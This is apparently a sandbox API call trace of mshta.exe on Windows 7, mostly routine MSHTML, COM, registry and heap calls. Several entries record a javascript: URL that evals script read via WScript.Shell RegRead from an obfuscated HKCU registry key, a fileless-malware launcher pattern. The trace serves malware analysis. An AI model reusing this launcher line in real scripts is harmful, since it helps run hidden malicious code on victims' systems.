NtdllDefWindowProc_W () returned 0x0 [0067.735] NtdllDefWindowProc_W () returned 0x0 [0067.736] NtdllDefWindowProc_W () returned 0x0 [0067.736] NtdllDefWindowProc_W () returned 0x0 [0067.736] NtdllDefWindowProc_W () returned 0x0 [0067.736] NtdllDefWindowProc_W () returned 0x0 [0067.737] NtdllDefWindowProc_W () returned 0x0 [0067.737] NtdllDefWindowProc_W () returned 0x0 [0067.737] NtdllDefWindowProc_W () returned 0x0 [0067.737] NtdllDefWindowProc_W () returned 0x0 [0067.737] NtdllDefWindowProc_W () returned 0x1 [0067.737] NtdllDefWindowProc_W () returned 0x0 [0067.738] NtdllDefWindowProc_W () returned 0x0 [0067.969] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.969] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x75300000 [0068.471] GetProcAddress (hModule=0x75300000, lpProcName="LresultFromObject") returned 0x75302663 [0068.471] LresultFromObject () returned 0xc171 [0069.661] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x6538d0 [0069.662] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x650910 [0069.714] GetCurrentThreadId () returned 0x2a8 [0069.721] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6538d0 | out: hHeap=0x610000) returned 1 [0069.722] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x60) returned 0x65cf98 [0069.723] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6538d0 [0069.723] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65e078 [0069.723] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cf98 | out: hHeap=0x610000) returned 1 [0069.723] IUnknown:QueryInterface (in: This=0x643e24, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18ee80 | out: ppvObject=0x18ee80*=0x65cf98) returned 0x0 [0069.724] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x60) returned 0x65cf98 [0069.724] IConnectionPointContainer:FindConnectionPoint (in: This=0x65cf98, riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x18ee98 | out: ppCP=0x18ee98*=0x65cfc0) returned 0x0 [0069.724] IConnectionPoint:Advise (in: This=0x65cfc0, pUnkSink=0x66cab8, pdwCookie=0x66cad0 | out: pdwCookie=0x66cad0*=0x66cab8) returned 0x0 [0069.724] IUnknown:QueryInterface (in: This=0x66cab8, riid=0x74afa638*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x18ee3c | out: ppvObject=0x18ee3c*=0x66cab8) returned 0x0 [0069.725] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x66bc80 [0069.725] IUnknown:AddRef (This=0x66cab8) returned 0x3 [0069.725] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65e150 [0069.725] IUnknown:Release (This=0x66cab8) returned 0x2 [0069.725] IUnknown:Release (This=0x65cfc0) returned 0x0 [0069.725] IUnknown:Release (This=0x65cf98) returned 0x0 [0069.725] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cf98 | out: hHeap=0x610000) returned 1 [0069.725] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x6509a0 [0069.725] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x48) returned 0x659f60 [0069.726] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0069.728] GetMessageTime () returned 0 [0069.728] GetMessagePos () returned 0x0 [0069.728] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x18ef94 | out: plResult=0x18ef94) returned 0x0 [0069.732] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0069.732] GetMessageTime () returned 0 [0069.732] GetMessagePos () returned 0x0 [0069.732] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x18e9c4 | out: plResult=0x18e9c4) returned 0x0 [0069.732] GetCurrentThreadId () returned 0x2a8 [0069.732] GetCurrentThreadId () returned 0x2a8 [0069.732] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0069.733] GetMessageTime () returned 0 [0069.733] GetMessagePos () returned 0x0 [0069.733] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f148 | out: lpPoint=0x18f148) returned 1 [0069.733] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f148 | out: lpPoint=0x18f148) returned 1 [0069.734] GetCapture () returned 0x0 [0069.734] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x658908 [0069.734] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x6509d0 [0069.734] IUnknown:AddRef (This=0x66cab8) returned 0x5 [0069.734] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x65b488 [0069.734] HTMLWindowEvents2:onresize (This=0x66cab8, pEvtObj=0x418) [0069.734] IUnknown:Release (This=0x66cab8) returned 0x4 [0069.734] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65b488 | out: hHeap=0x610000) returned 1 [0069.734] GetCurrentThreadId () returned 0x2a8 [0069.734] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x658908 | out: hHeap=0x610000) returned 1 [0069.735] GetCurrentThreadId () returned 0x2a8 [0069.735] GetCurrentThreadId () returned 0x2a8 [0069.735] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x18f384 | out: plResult=0x18f384) returned 0x1 [0069.735] NtdllDefWindowProc_W () returned 0x0 [0069.735] GetCurrentThreadId () returned 0x2a8 [0069.736] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x644ee8, hWnd=0x202aa, phIMC=0x18f6ac | out: phIMC=0x18f6ac*=0x80243) returned 0x0 [0069.736] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x644ee8, hWnd=0x202aa, hIME=0x0, phPrev=0x18f6ac | out: phPrev=0x18f6ac*=0x80243) returned 0x0 [0069.736] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x60) returned 0x65cf98 [0069.736] IConnectionPointContainer:FindConnectionPoint (in: This=0x65cf98, riid=0x758221c8*(Data1=0x3050f613, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x18f51c | out: ppCP=0x18f51c*=0x65cfb8) returned 0x0 [0069.736] IConnectionPoint:Unadvise (This=0x65cfb8, dwCookie=0x66cab8) returned 0x0 [0069.736] IUnknown:AddRef (This=0x66cab8) returned 0x5 [0069.736] IUnknown:Release (This=0x66cab8) returned 0x4 [0069.736] IUnknown:Release (This=0x66cab8) returned 0x3 [0069.736] IUnknown:Release (This=0x65cfb8) returned 0x0 [0069.736] IUnknown:Release (This=0x65cf98) returned 0x0 [0069.736] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cf98 | out: hHeap=0x610000) returned 1 [0069.736] IUnknown:QueryInterface (in: This=0x643e24, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18f514 | out: ppvObject=0x18f514*=0x65cf98) returned 0x0 [0069.736] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x60) returned 0x65cf98 [0069.737] IConnectionPointContainer:FindConnectionPoint (in: This=0x65cf98, riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x18f518 | out: ppCP=0x18f518*=0x65cfc0) returned 0x0 [0069.737] IConnectionPoint:Unadvise (This=0x65cfc0, dwCookie=0x66cab8) returned 0x0 [0069.737] IUnknown:AddRef (This=0x66cab8) returned 0x4 [0069.737] IUnknown:Release (This=0x66cab8) returned 0x3 [0069.737] IUnknown:Release (This=0x66cab8) returned 0x2 [0069.737] IUnknown:Release (This=0x65cfc0) returned 0x0 [0069.737] IUnknown:Release (This=0x65cf98) returned 0x0 [0069.737] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cf98 | out: hHeap=0x610000) returned 1 [0069.738] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6509d0 | out: hHeap=0x610000) returned 1 [0069.738] IUnknown:Release (This=0x643e24) returned 0x3 [0069.738] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6509a0 | out: hHeap=0x610000) returned 1 [0069.738] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0069.738] GetMessageTime () returned 0 [0069.738] GetMessagePos () returned 0x0 [0069.738] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x18f394 | out: plResult=0x18f394) returned 0x0 [0069.739] GetCurrentThreadId () returned 0x2a8 [0069.739] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0069.739] GetMessageTime () returned 0 [0069.739] GetMessagePos () returned 0x0 [0069.739] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x18f394 | out: plResult=0x18f394) returned 0x0 [0069.739] GetCurrentThreadId () returned 0x2a8 [0069.739] IsOS (dwOS=0x25) returned 1 [0069.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f5a0 | out: phkResult=0x18f5a0*=0x1e8) returned 0x0 [0069.740] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f5a4 | out: phkResult=0x18f5a4*=0x1ec) returned 0x0 [0069.740] RegOpenKeyExW (in: hKey=0x1ec, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x18f560 | out: phkResult=0x18f560*=0x0) returned 0x2 [0069.740] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x18f560 | out: phkResult=0x18f560*=0x1f0) returned 0x0 [0069.740] SHRegGetValueW () returned 0x0 [0069.740] RegCloseKey (hKey=0x1f0) returned 0x0 [0069.740] RegCloseKey (hKey=0x0) returned 0x6 [0069.740] RegCloseKey (hKey=0x0) returned 0x6 [0069.740] RegCloseKey (hKey=0x1e8) returned 0x0 [0069.741] RegCloseKey (hKey=0x1ec) returned 0x0 [0069.741] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x73710000 [0071.860] GetVersionExW (in: lpVersionInformation=0x18f0ac*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f0ac*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0071.860] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x73710000 [0071.861] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x18f628, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.870] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x18f688, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.870] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x6509a0 [0071.870] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x18f674, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.871] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x62d7f8, Size=0x48) returned 0x659fb0 [0071.871] ShowWindow (hWnd=0x202aa, nCmdShow=1) returned 1 [0071.871] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f140 | out: hHeap=0x610000) returned 1 [0071.871] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 1 [0071.871] TranslateMessage (lpMsg=0x18f8e4) returned 0 [0071.871] DispatchMessageW (lpMsg=0x18f8e4) returned 0x0 [0071.872] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x63f140 [0071.872] RegisterDragDrop (hwnd=0x202aa, pDropTarget=0x750296cc) returned 0x0 [0071.873] GetCurrentThreadId () returned 0x2a8 [0071.873] GetCurrentThreadId () returned 0x2a8 [0071.873] GetCurrentThreadId () returned 0x2a8 [0071.873] GetCurrentThreadId () returned 0x2a8 [0071.873] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 1 [0071.873] TranslateMessage (lpMsg=0x18f8e4) returned 0 [0071.873] DispatchMessageW (lpMsg=0x18f8e4) returned 0x0 [0071.874] IInternetProtocolRoot:Continue (This=0x652acc, pProtocolData=0x62d8d8) returned 0x80004004 [0071.874] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1a) returned 0x668e08 [0071.874] ParseURLW (in: pcszURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18f6e0 | out: ppu=0x18f6e0) returned 0x0 [0071.874] IUnknown:QueryInterface (in: This=0x6505a0, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18f5d4 | out: ppvObject=0x18f5d4*=0x0) returned 0x80004002 [0071.874] IServiceProvider:QueryService (in: This=0x6505a4, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18f5d4 | out: ppvObject=0x18f5d4*=0x643cd4) returned 0x0 [0071.874] GetCurrentThreadId () returned 0x2a8 [0071.875] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f688 | out: phkResult=0x18f688*=0x21c) returned 0x0 [0071.875] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f68c | out: phkResult=0x18f68c*=0x220) returned 0x0 [0071.875] RegOpenKeyExW (in: hKey=0x220, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x18f648 | out: phkResult=0x18f648*=0x0) returned 0x2 [0071.875] RegOpenKeyExW (in: hKey=0x21c, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x18f648 | out: phkResult=0x18f648*=0x0) returned 0x2 [0071.876] RegCloseKey (hKey=0x0) returned 0x6 [0071.876] RegCloseKey (hKey=0x0) returned 0x6 [0071.876] RegCloseKey (hKey=0x21c) returned 0x0 [0071.876] RegCloseKey (hKey=0x220) returned 0x0 [0071.879] StrToIntW (lpSrc="6573520") returned 6573520 [0071.879] CoTaskMemFree (pv=0x62d7f8) [0071.880] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0071.880] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pdwZone=0x18f67c, dwFlags=0x0 | out: pdwZone=0x18f67c*=0xffffffff) returned 0x800c0011 [0071.881] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0071.881] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0071.881] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0071.881] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwAction=0x1400, pPolicy=0x18f680, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x18f680*=0x0) returned 0x0 [0071.881] IUnknown:Release (This=0x63be1c) returned 0x3 [0071.881] CoCreateInstance (in: rclsid=0x18f634*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x18f5f0 | out: ppv=0x18f5f0*=0x28c0488) returned 0x0 [0072.899] malloc (_Size=0x80) returned 0x3bdbb0 [0072.899] GetVersion () returned 0x1db10106 [0072.899] __dllonexit () returned 0x74a57ecf [0072.900] __dllonexit () returned 0x74a57e9b [0072.900] __dllonexit () returned 0x74a57eb5 [0072.900] __dllonexit () returned 0x74a57f70 [0072.949] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0072.950] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.950] EtwRegisterTraceGuidsA () returned 0x0 [0072.950] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.950] EtwRegisterTraceGuidsA () returned 0x0 [0072.950] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dfa4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0072.952] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0072.952] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x18e0c8 | out: phkResult=0x18e0c8*=0x0) returned 0x2 [0072.958] GetVersion () returned 0x1db10106 [0072.958] DllGetClassObject (in: rclsid=0x640ca0*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e8b4 | out: ppv=0x18e8b4*=0x3bfe00) returned 0x0 [0072.958] ??2@YAPAXI@Z () returned 0x3bfe00 [0072.959] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x3bfe00, pUnkOuter=0x0, riid=0x18f260*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x18e8a0 | out: ppvObject=0x18e8a0*=0x28c0488) returned 0x0 [0072.959] ??2@YAPAXI@Z () returned 0x28c0488 [0072.959] GetUserDefaultLCID () returned 0x409 [0072.959] GetACP () returned 0x4e4 [0072.959] JScriptEngine5:IUnknown:AddRef (This=0x28c0488) returned 0x2 [0072.959] JScriptEngine5:IUnknown:Release (This=0x28c0488) returned 0x1 [0072.960] JScriptEngine5:IUnknown:Release (This=0x3bfe00) returned 0x0 [0072.960] ??3@YAXPAX@Z () returned 0x1 [0072.960] JScriptEngine5:IUnknown:QueryInterface (in: This=0x28c0488, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x18f594 | out: ppvObject=0x18f594*=0x28c0488) returned 0x0 [0072.960] JScriptEngine5:IUnknown:Release (This=0x28c0488) returned 0x1 [0072.960] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0072.960] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pdwZone=0x18f504, dwFlags=0x0 | out: pdwZone=0x18f504*=0xffffffff) returned 0x800c0011 [0072.960] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0072.960] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0072.960] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0072.960] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwAction=0x1401, pPolicy=0x18f508, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x18f508*=0x0) returned 0x0 [0072.960] IUnknown:Release (This=0x63be1c) returned 0x3 [0072.960] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x54) returned 0x66cdb8 [0072.979] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x66df50 [0072.979] GetCurrentThreadId () returned 0x2a8 [0072.979] ??2@YAPAXI@Z () returned 0x3bfe00 [0072.979] GetCurrentThreadId () returned 0x2a8 [0072.979] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f430 | out: phkResult=0x18f430*=0x224) returned 0x0 [0072.980] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0072.980] RegQueryValueExA (in: hKey=0x224, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x18f424, lpData=0x18f428, lpcbData=0x18f42c*=0x4 | out: lpType=0x18f424*=0x4, lpData=0x18f428*=0x1, lpcbData=0x18f42c*=0x4) returned 0x0 [0072.980] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0072.980] RegCloseKey (hKey=0x224) returned 0x0 [0072.980] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0072.980] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0072.980] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0072.981] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0072.981] CoCreateInstance (in: rclsid=0x74a423a8*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a423b8*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f42c | out: ppv=0x18f42c*=0x76766460) returned 0x0 [0072.981] ??2@YAPAXI@Z () returned 0x3bfe38 [0072.981] ??_U@YAPAXI@Z () returned 0x3b13c0 [0072.981] ??2@YAPAXI@Z () returned 0x3bfec8 [0072.981] ??2@YAPAXI@Z () returned 0x28c06a0 [0072.982] ??2@YAPAXI@Z () returned 0x3bff00 [0072.983] GetCurrentThreadId () returned 0x2a8 [0072.983] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x18f3d0, nSize=0x27 | out: lpBuffer="") returned 0x0 [0072.983] GetCurrentThreadId () returned 0x2a8 [0072.984] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0072.984] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f440, cchData=6 | out: lpLCData="1252") returned 5 [0072.984] IsValidCodePage (CodePage=0x4e4) returned 1 [0072.984] GetCurrentThreadId () returned 0x2a8 [0072.984] GetCurrentThreadId () returned 0x2a8 [0072.984] CoCreateInstance (in: rclsid=0x74a415ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a415fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x28c0674 | out: ppv=0x28c0674*=0x65e300) returned 0x0 [0072.985] IUnknown:AddRef (This=0x65e300) returned 0x2 [0072.985] GetCurrentProcessId () returned 0x5bc [0072.985] GetCurrentThreadId () returned 0x2a8 [0072.985] GetTickCount () returned 0x1148ce5 [0072.985] ISystemDebugEventFire:BeginSession (This=0x65e300, guidSourceID=0x74a416d4, strSessionName="JScript:00001468:00000680:18124005") returned 0x0 [0072.985] GetCurrentThreadId () returned 0x2a8 [0072.985] GetCurrentThreadId () returned 0x2a8 [0072.985] ??2@YAPAXI@Z () returned 0x3bff68 [0072.994] GetCurrentThreadId () returned 0x2a8 [0072.994] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0072.994] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x66bce0 [0072.994] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f39c | out: ppv=0x18f39c*=0x6368d8) returned 0x0 [0072.994] ??2@YAPAXI@Z () returned 0x3bffa0 [0072.994] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x76766460, pUnk=0x3bffa0, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x3bffbc | out: pdwCookie=0x3bffbc*=0x100) returned 0x0 [0072.995] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x3bffa0, riid=0x766597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f320 | out: ppvObject=0x18f320*=0x0) returned 0x80004002 [0072.995] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x3bffa0, riid=0x76663e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f310 | out: ppvObject=0x18f310*=0x0) returned 0x80004002 